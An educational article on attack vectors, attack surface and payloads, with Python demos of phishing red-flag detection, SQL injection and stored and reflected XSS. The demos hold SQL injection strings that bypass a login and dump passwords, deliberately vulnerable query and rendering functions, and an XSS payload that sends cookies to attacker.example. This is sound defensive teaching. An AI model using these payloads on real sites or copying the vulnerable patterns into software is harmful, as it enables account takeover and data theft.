What is an Attack Vector?

Learning Objectives

  • Learn the concepts of attack vectors, attack surface and payload
  • Explore the various types of attack vectors
  • Understand how an attack vector is used

To take advantage of a vulnerability, attackers need a path along which to launch an exploit. An attack vector is the pathway or method a threat actor uses to reach a target and get past its defenses. The vector might exploit human error through a phishing message, or an outdated component in server software that allows a compromise. To build defenses around attack vectors, you must understand the many ways attackers can reach and compromise a system.


What is the difference between an attack vector, an attack surface, and a payload?

An attack vector is the pathway to an exploit, so it is a central consideration when building defenses. For example, if your users cannot recognize the red flags of a phishing message and your defenses include no email filtering, attackers can leverage that human error to install malware on the network or steal credentials. Social engineering is another common vector: an attacker persuades a high-privilege user to pay a fraudulent invoice or to divulge their network credentials.

Threat actors can spend weeks identifying vulnerabilities and the right attack vector to reach them, and exploiting the vector can take longer still. Once inside, attackers usually work to avoid detection so that they can steal as much data as possible or deliver the payload of their choice.

Your attack surface is the sum of all points where an attacker could try to enter your environment or extract data from it: exposed services, user accounts, devices, third-party integrations, and so on. Every piece of infrastructure you add enlarges it. Keep the attack surface as small as possible, but some exposure is unavoidable. When you must expand it, put defenses in place to protect the new components, remembering that the risk is reduced, not eliminated.

The payload is what the attack does once the vector has delivered it: the code or action carried to the target. For example, when an attacker installs ransomware on a user's computer via a phishing attack, the payload encrypts files and holds them hostage until the ransom is paid. Delivering the payload is the final step in a compromise, and its impact ranges from minor to devastating for the organization and its data.

Examples of attack vectors

Phishing is one of the most common attack vectors, and it is most effective when combined with social engineering tailored to the intended exploit and payload. It works because users overlook the red flags in a malicious message. The attacker might include a link to a malicious website, an attachment carrying a malicious macro, or simply impersonate a colleague and ask for sensitive information.
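Several of those red flags can be checked mechanically before a message ever reaches a user. The following is an added example, not code from the original article: it parses a constructed phishing message and a constructed legitimate one and reports three classic mismatches (a display name that claims a domain the real sender address does not belong to, a Reply-To on a different domain, and link text that shows one domain while the href leads to another). The domains acmebank.example, acmebank-verify.example, login-verify.example and freemail.example are hypothetical, and the "last two labels" approximation of a registrable domain is an assumption made to keep the example self-contained.

```python
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches something that looks like a host name inside free text, e.g. "acmebank.example".
DOMAIN_RE = re.compile(r"[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}")


def registrable_domain(host):
    """Approximate the registrable domain as the last two labels.

    Assumption for this example: a real filter should consult the public suffix list,
    otherwise hosts such as example.co.uk are compared incorrectly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def _domain_of(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


class LinkExtractor(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None   # None while we are outside an <a> element
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def phishing_red_flags(from_header, reply_to_header, html_body):
    """Return a list of human-readable red flags found in one message."""
    flags = []
    display_name, from_addr = parseaddr(from_header)
    from_domain = _domain_of(from_addr)

    # 1. Display name claims a domain that the real sender address does not belong to.
    for claimed in DOMAIN_RE.findall(display_name.lower()):
        if registrable_domain(claimed) != registrable_domain(from_domain):
            flags.append(f"display name shows {claimed} but sender domain is {from_domain}")

    # 2. Reply-To diverts replies to a domain other than the apparent sender's.
    if reply_to_header:
        reply_domain = _domain_of(parseaddr(reply_to_header)[1])
        if reply_domain and registrable_domain(reply_domain) != registrable_domain(from_domain):
            flags.append(f"Reply-To domain {reply_domain} differs from sender domain {from_domain}")

    # 3. Link text shows one domain while the href actually leads somewhere else.
    extractor = LinkExtractor()
    extractor.feed(html_body)
    for text, href in extractor.links:
        target = (urlparse(href).hostname or "").lower()
        for shown in DOMAIN_RE.findall(text.lower()):
            if registrable_domain(shown) != registrable_domain(target):
                flags.append(f"link text shows {shown} but href points to {target}")
    return flags


# Constructed sample messages (not real traffic).
PHISH_FROM = '"security@acmebank.example" <alerts@acmebank-verify.example>'
PHISH_REPLY_TO = "Acme Support <acme.support@freemail.example>"
PHISH_BODY = (
    '<p>Your account is locked. Verify now: '
    '<a href="http://acmebank.example.login-verify.example/reset">https://acmebank.example/reset</a>'
    '</p><p><a href="https://acmebank.example/help">Help Center</a></p>'
)
LEGIT_FROM = '"Acme Bank" <alerts@acmebank.example>'
LEGIT_BODY = '<p>Your statement is ready: <a href="https://acmebank.example/statements">acmebank.example</a></p>'

if __name__ == "__main__":
    for flag in phishing_red_flags(PHISH_FROM, PHISH_REPLY_TO, PHISH_BODY):
        print("RED FLAG:", flag)
    print("legitimate message flags:", phishing_red_flags(LEGIT_FROM, None, LEGIT_BODY))
```

The constructed phishing message trips all three checks while the legitimate one trips none. Heuristics like these are what an email filter layers on top of sender authentication (SPF, DKIM, DMARC); none of them replaces the user training the paragraph above describes, because a message with no links and an accurate-looking sender can still ask for sensitive information.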

A distributed denial-of-service (DDoS) attack floods a target with traffic from many sources, typically a botnet, until its servers or network links exhaust their capacity and stop serving legitimate users. Large DDoS attacks push enormous volumes of traffic at a target, and a sophisticated attack against critical Internet infrastructure can cause widespread outages. A denial-of-service (DoS) attack isn't always distributed, and not every DoS is volumetric: if an attacker can exploit a vulnerability to crash or hang a service, they have launched a DoS with a single request.

Web applications can be vulnerable to both SQL injection and cross-site scripting (XSS). In a SQL injection attack, a threat actor supplies input that the application concatenates into a SQL statement, so the input is interpreted as SQL rather than as data. It usually arrives via a web form field or URL parameter, but any interface that passes input to a SQL backend can be abused. Depending on the privileges the application holds on the database, an injection can read data it should never expose (dumping tables to the frontend), modify or insert rows, and in some cases escalate privileges on the database server.
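To make the concatenation mistake concrete, here is an added example (not code from the original article) that runs against a constructed in-memory SQLite table. The same login query is written twice: once with the form input pasted into the SQL text, once with bound parameters. The attacker inputs show a password-check bypass and a UNION-based dump of another column. Plaintext passwords are used only to keep the example short; a real application stores password hashes.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Form input is pasted straight into the statement: the attacker controls SQL syntax."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the input is bound as data and is never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Constructed attacker inputs.
BYPASS_USER = "alice' --"   # closes the string, then comments out the password check
DUMP_USER = "' UNION SELECT username, password FROM users --"   # returns a column the page never shows

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass:", login_vulnerable(db, BYPASS_USER, "wrong"))
    print("vulnerable, dump:  ", login_vulnerable(db, DUMP_USER, "wrong"))
    print("safe, bypass:      ", login_safe(db, BYPASS_USER, "wrong"))
    print("safe, dump:        ", login_safe(db, DUMP_USER, "wrong"))
```

With the vulnerable function, the first input logs in as the admin without a password and the second returns every username and password through a query that was only meant to return a username and role; the parameterized function returns nothing for either, because the quotes and the `--` are just characters inside a value. The UNION trick works here because the injected SELECT returns the same number of columns as the original one, which is why attackers probe column counts first.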

With an XSS attack vector, a threat actor injects script into a web page so that it runs in the victim's browser, in the context of that user's session. If the script can read a session cookie or access token, the attacker can use it to act on the user's behalf. Where the payload comes from determines the type: in reflected XSS the payload is carried in the request (a URL parameter, for example) and echoed straight back into the response, so it does not persist; in persistent (stored) XSS the payload is saved in the database, for instance inside a comment, and served to every user who views that page.
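Both variants come down to untrusted text being written into HTML without encoding. The following added example (not code from the original article) uses a constructed in-memory comment list as the "database" and a constructed payload that would send the viewer's cookie to a hypothetical attacker.example host; it renders the comments and a search page once vulnerably and once with HTML escaping applied.

```python
import html

# Constructed comment store standing in for the application's database.
COMMENTS = []


def store_comment(author, body):
    """Persist an untrusted comment exactly as submitted; the sink is in rendering, not storage."""
    COMMENTS.append({"author": author, "body": body})


def render_comments_vulnerable():
    """Stored XSS: strings from the database are interpolated into HTML verbatim,
    so a script in any comment runs in the browser of every user who views the page."""
    items = "".join(f"<li><b>{c['author']}</b>: {c['body']}</li>" for c in COMMENTS)
    return f"<ul>{items}</ul>"


def render_comments_safe():
    """HTML-escapes every untrusted value so the browser treats it as text, not markup."""
    items = "".join(
        f"<li><b>{html.escape(c['author'])}</b>: {html.escape(c['body'])}</li>"
        for c in COMMENTS
    )
    return f"<ul>{items}</ul>"


def search_page_vulnerable(query):
    """Reflected XSS: the request parameter is echoed straight back into the response."""
    return f"<h1>Results for: {query}</h1>"


def search_page_safe(query):
    return f"<h1>Results for: {html.escape(query)}</h1>"


# Constructed payload: ships document.cookie to an attacker-controlled host.
PAYLOAD = "<script>fetch('https://attacker.example/c?'+document.cookie)</script>"

if __name__ == "__main__":
    store_comment("mallory", "Great post! " + PAYLOAD)
    print(render_comments_vulnerable())   # <script> reaches every viewer
    print(render_comments_safe())         # &lt;script&gt; is displayed as text
    print(search_page_vulnerable(PAYLOAD))
    print(search_page_safe(PAYLOAD))
```

Note that html.escape is the right encoding only for element content and quoted attribute values; text placed inside a script block, an event handler, a URL or a CSS rule needs the encoding for that context. Marking the session cookie HttpOnly keeps this particular payload from reading it, and a Content-Security-Policy can block the outbound fetch, but neither removes the injection itself.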

What can threat actors do with attack vectors?

For many threat actors hacking is a business, and their goal is to monetize their efforts. Not everyone who finds a vector is malicious, however: a security researcher who discovers one will typically notify the business of the vulnerability and help fix it.

A malicious threat actor may have any of several goals. In a DDoS attack, the attacker wants to take web services down and keep them down. The disruption persists until the organization can mitigate it, and every minute of downtime costs the organization money.

Disruption isn't the only motive. Stolen data is valuable to an attacker: it can be sold on darknet markets or used for identity theft. If an attacker can steal millions of records and each one fetches several dollars on a darknet market, a data breach becomes extremely profitable.

In corporate espionage, an attacker may be hired to steal intellectual property from the organization. The longer an attacker remains on the network undetected, the more information they can exfiltrate, which is why monitoring your environment is critical to protecting your network and private data.
